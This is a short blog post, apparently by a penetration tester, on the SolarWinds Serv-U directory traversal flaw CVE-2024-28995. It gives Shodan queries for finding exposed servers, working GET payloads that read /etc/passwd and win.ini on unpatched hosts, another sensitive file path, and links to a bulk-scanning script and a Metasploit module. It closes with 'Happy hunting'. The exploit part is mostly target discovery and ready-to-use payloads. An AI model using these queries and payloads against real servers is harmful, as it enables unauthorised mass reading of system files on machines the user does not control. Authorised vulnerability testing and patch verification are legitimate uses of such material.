Testing SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)

NoorHomaid
2 min readJun 25, 2024

--

It’s been a while since my last publication here. Here i will be explaining SolarWinds Serv-U was susceptible to a directory traversal vulnerability

What is SolarWinds Serv-U ?

SolarWinds Serv-U is a file transfer server that allows you to securely send and receive files between computers on a network. It comes in two editions (Serv-U FTP and Serv-U MFT).

What is SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)?

It is a directory transversal vulnerability that would allow access to read sensitive files, such as /etc/passwd and other system files, on the system running Serv-U, even if they are not authorized to do so.

It impacts Serv-U 15.4.2 HF 1 and previous versions.

Level of privilege required to exploit the vulnerability :

None, unauthenticated attacker can access and read file systems.

Finding the target

We can use osint like shodan to gather targets that are running SolarWinds Serv-U , this is useful usually if you are working with bug hunting.

Shodan dork:

product:"Serv-U ftpd" 

Using shodan CLI

shodan search product:Serv-U ftpd

Check the the result of the impacted version of Serv-U.

For pen-testers, you might customize the search query by adding the target you are testing in the search query via the ssl certificate filter.

Exploiting the vulnerability

The vulnerability is accessed via a GET request to the root (/) and using a parameter named “InternalDir” and “InternalFile” being set to the desired file to read.

A) Manul

The payload used for exploiting in (Linux) :

GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd

The payload used for exploiting in (Windows) :

GET /?InternalDir=/../../../../windows&InternalFile=win.ini

Tip: to search for targets running server on Windows we can add “os:Windows” to our previous shodan dork that we used to find the target.

After intercepting the GET request using burp, we can add the payload and we will get the result

Note: other sensitive file to read on the vulnerable Serv-U server

/ProgramData/RhinoSoft/Serv-U/Serv-U-StartupLog.txt 
(contains startup logs info for the Serv-U FTP server)

B) Automation(scripts)

You can use the following scripts to exploit single or a multiple targets (Bulk scanning) all at once:

https://github.com/bigb0x/CVE-2024-28995

C) Public exploit (Metasploit): gather/solarwinds_servu_fileread_cve_2024_28995

https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-SOLARWINDS_SERVU_FILEREAD_CVE_2024_28995-

Happy hunting !

References:

--

--

NoorHomaid
NoorHomaid

Written by NoorHomaid

BS in cybersecurity . PenTester . Web security researcher

No responses yet